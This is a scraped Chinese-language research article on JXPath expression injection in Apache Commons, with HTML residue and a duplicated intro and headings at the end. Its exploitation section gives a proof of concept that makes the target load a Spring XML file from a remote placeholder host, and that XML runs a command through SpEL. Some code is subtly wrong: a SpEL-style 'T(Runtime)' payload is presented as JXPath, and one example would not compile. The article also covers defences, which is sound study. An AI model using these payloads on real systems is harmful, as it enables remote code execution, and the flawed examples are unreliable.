JXPath表达式注入漏洞研究<\/h1>

前言<\/h2>
JXPath是Apache Commons项目中的一个库，用于使用XPath语法导航和处理Java对象图。本文将深入研究JXPath表达式注入漏洞的原理、利用方式及防御措施。<\/p>

JXPath表达式基础语法<\/h2>

JavaBean属性访问<\/h3>

JXPath可用于访问JavaBean的属性：<\/p>

public<\/span> class<\/span> Employee<\/span> {<\/span>
<\/span><\/span>    public<\/span> String getFirstName<\/span>(){<\/span> ...<\/span> }<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span>
<\/span><\/span>Employee emp =<\/span> new<\/span> Employee();<\/span>
<\/span><\/span>JXPathContext context =<\/span> JXPathContext.<\/span>newContext<\/span>(<\/span>emp);<\/span>
<\/span><\/span>String fName =<\/span> (<\/span>String)<\/span> context.<\/span>getValue<\/span>(<\/span>"firstName"<\/span>);<\/span>
<\/span><\/span><\/code><\/pre>嵌套Bean属性访问<\/h3>
JXPath可以遍历对象图：<\/p>
public<\/span> class<\/span> Employee<\/span> {<\/span>
<\/span><\/span>    public<\/span> Address getHomeAddress<\/span>(){<\/span> ...<\/span> }<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span>
<\/span><\/span>public<\/span> class<\/span> Address<\/span> {<\/span>
<\/span><\/span>    public<\/span> String getStreetNumber<\/span>(){<\/span> ...<\/span> }<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span>
<\/span><\/span>Employee emp =<\/span> new<\/span> Employee();<\/span>
<\/span><\/span>JXPathContext context =<\/span> JXPathContext.<\/span>newContext<\/span>(<\/span>emp);<\/span>
<\/span><\/span>String sNumber =<\/span> (<\/span>String)<\/span> context.<\/span>getValue<\/span>(<\/span>"homeAddress\/streetNumber"<\/span>);<\/span>
<\/span><\/span><\/code><\/pre>构造对象<\/h3>
JXPath可以使用标准扩展函数调用对象方法、类的静态方法以及使用任何构造函数创建对象：<\/p>
Book book =<\/span> (<\/span>Book)<\/span>context.<\/span>getValue<\/span>(<\/span>"com.myco.books.Book.new('John Updike')"<\/span>);<\/span>
<\/span><\/span><\/code><\/pre>调用静态方法<\/h3>
Book book =<\/span> (<\/span>Book)<\/span>context.<\/span>getValue<\/span>(<\/span>"com.myco.books.Book.getBestBook('John Updike')"<\/span>);<\/span>
<\/span><\/span><\/code><\/pre>调用一般方法<\/h3>
String firstName =<\/span> (<\/span>String)<\/span>context.<\/span>getValue<\/span>(<\/span>"getAuthorsFirstName($book)"<\/span>);<\/span>
<\/span><\/span><\/code><\/pre>表达式恶意利用<\/h2>
通过构造方法利用<\/h3>
攻击者可以通过构造方法执行恶意代码：<\/p>
import<\/span> org.apache.commons.jxpath.JXPathContext;<\/span>
<\/span><\/span>
<\/span><\/span>public<\/span> class<\/span> JXpathDemo<\/span> {<\/span>
<\/span><\/span>    public<\/span> static<\/span> void<\/span> main<\/span>(<\/span>String[]<\/span> args)<\/span> {<\/span>
<\/span><\/span>        try<\/span> {<\/span>
<\/span><\/span>            JXPathContext context =<\/span> JXPathContext.<\/span>newContext<\/span>(<\/span>null<\/span>);<\/span>
<\/span><\/span>            String key =<\/span> (<\/span>String)<\/span> context.<\/span>getValue<\/span>(<\/span>"org.springframework.context.support.ClassPathXmlApplicationContext.new(\"http:\/\/ip\/poc.xml\")"<\/span>);<\/span>
<\/span><\/span>            System.<\/span>out<\/span>.<\/span>println<\/span>(<\/span>key);<\/span>
<\/span><\/span>        }<\/span> catch<\/span> (<\/span>Exception exception)<\/span> {<\/span>
<\/span><\/span>            exception.<\/span>printStackTrace<\/span>();<\/span>
<\/span><\/span>        }<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>配合恶意XML文件：<\/p>
<?xml version="1.0" encoding="UTF-8"?><\/span>
<\/span><\/span><beans<\/span> xmlns=<\/span>"http:\/\/www.springframework.org\/schema\/beans"<\/span>
<\/span><\/span>       xmlns:xsi=<\/span>"http:\/\/www.w3.org\/2001\/XMLSchema-instance"<\/span>
<\/span><\/span>       xsi:schemaLocation=<\/span>"http:\/\/www.springframework.org\/schema\/beans http:\/\/www.springframework.org\/schema\/beans\/spring-beans.xsd"<\/span>><\/span>
<\/span><\/span>    <bean<\/span> id=<\/span>"evil"<\/span> class=<\/span>"java.lang.String"<\/span>><\/span>
<\/span><\/span>        <constructor-arg<\/span> value=<\/span>"#{T(Runtime).getRuntime().exec('calc')}"<\/span>\/><\/span>
<\/span><\/span>    <\/bean><\/span>
<\/span><\/span><\/beans><\/span>
<\/span><\/span><\/code><\/pre>调用静态方法利用<\/h3>
虽然Runtime.exec()<\/code>不是静态方法，但如果存在其他危险的静态方法，也可以被利用：<\/p>
\/\/ 假设存在一个危险的静态方法
<\/span><\/span><\/span><\/span>public<\/span> class<\/span> MaliciousClass<\/span> {<\/span>
<\/span><\/span>    public<\/span> static<\/span> void<\/span> executeCommand<\/span>(<\/span>String cmd)<\/span> {<\/span>
<\/span><\/span>        Runtime.<\/span>getRuntime<\/span>().<\/span>exec<\/span>(<\/span>cmd);<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span>
<\/span><\/span>\/\/ 攻击者可以这样调用
<\/span><\/span><\/span><\/span>context.<\/span>getValue<\/span>(<\/span>"com.example.MaliciousClass.executeCommand('malicious command')"<\/span>);<\/span>
<\/span><\/span><\/code><\/pre>调用一般方法利用<\/h3>
利用Runtime执行命令：<\/p>
context.<\/span>getValue<\/span>(<\/span>"T(Runtime).getRuntime().exec('calc')"<\/span>);<\/span>
<\/span><\/span><\/code><\/pre>调用过程调试分析<\/h2>
调用栈分析<\/h3>
关键调用栈如下：<\/p>

JXPathContext.getValue()<\/code><\/li>
JXPathContext.interpret()<\/code><\/li>
PathParser.parseExpression()<\/code><\/li>
Function.invoke()<\/code><\/li>
<\/ol>
核心方法分析<\/h3>
关键方法逻辑：<\/p>


获取基本信息：<\/p>

String namespace: 函数命名空间（可能为空）<\/li>
String name: 方法名<\/li>
Object[] parameters: 方法参数列表<\/li>
<\/ul>
<\/li>

处理流程：<\/p>

检查命名空间<\/li>
处理参数<\/li>
查找实例方法或静态方法<\/li>
<\/ul>
<\/li>

方法查找：<\/p>

根据方法名和参数类型查找对应方法<\/li>
对静态方法和构造函数进行特殊处理<\/li>
<\/ul>
<\/li>

方法调用：<\/p>

最终通过function.invoke(context, parameters)<\/code>调用目标方法<\/li>
<\/ul>
<\/li>
<\/ol>
防御措施<\/h2>

输入验证<\/strong>：严格验证用户提供的JXPath表达式，禁止包含危险方法调用<\/li>
沙箱环境<\/strong>：在受限环境中执行JXPath表达式<\/li>
白名单机制<\/strong>：只允许特定的安全表达式<\/li>
安全配置<\/strong>：禁用危险的扩展功能<\/li>
最小权限<\/strong>：以最低必要权限运行应用程序<\/li>
<\/ol>
总结<\/h2>
JXPath表达式注入漏洞源于对用户输入的不当处理，允许攻击者通过构造恶意表达式调用危险方法。了解其原理和利用方式有助于开发更安全的应用程序。在实际开发中，应避免直接将用户输入作为JXPath表达式执行，或采取严格的过滤和限制措施。<\/p>

JXPath表达式注入漏洞研究<\/h1>

前言<\/h2> JXPath是Apache Commons项目中的一个库，用于使用XPath语法导航和处理Java对象图。本文将深入研究JXPath表达式注入漏洞的原理、利用方式及防御措施。<\/p>

JXPath表达式基础语法<\/h2>

表达式恶意利用<\/h2>

调用过程调试分析<\/h2>

前言<\/h2>
JXPath是Apache Commons项目中的一个库，用于使用XPath语法导航和处理Java对象图。本文将深入研究JXPath表达式注入漏洞的原理、利用方式及防御措施。<\/p>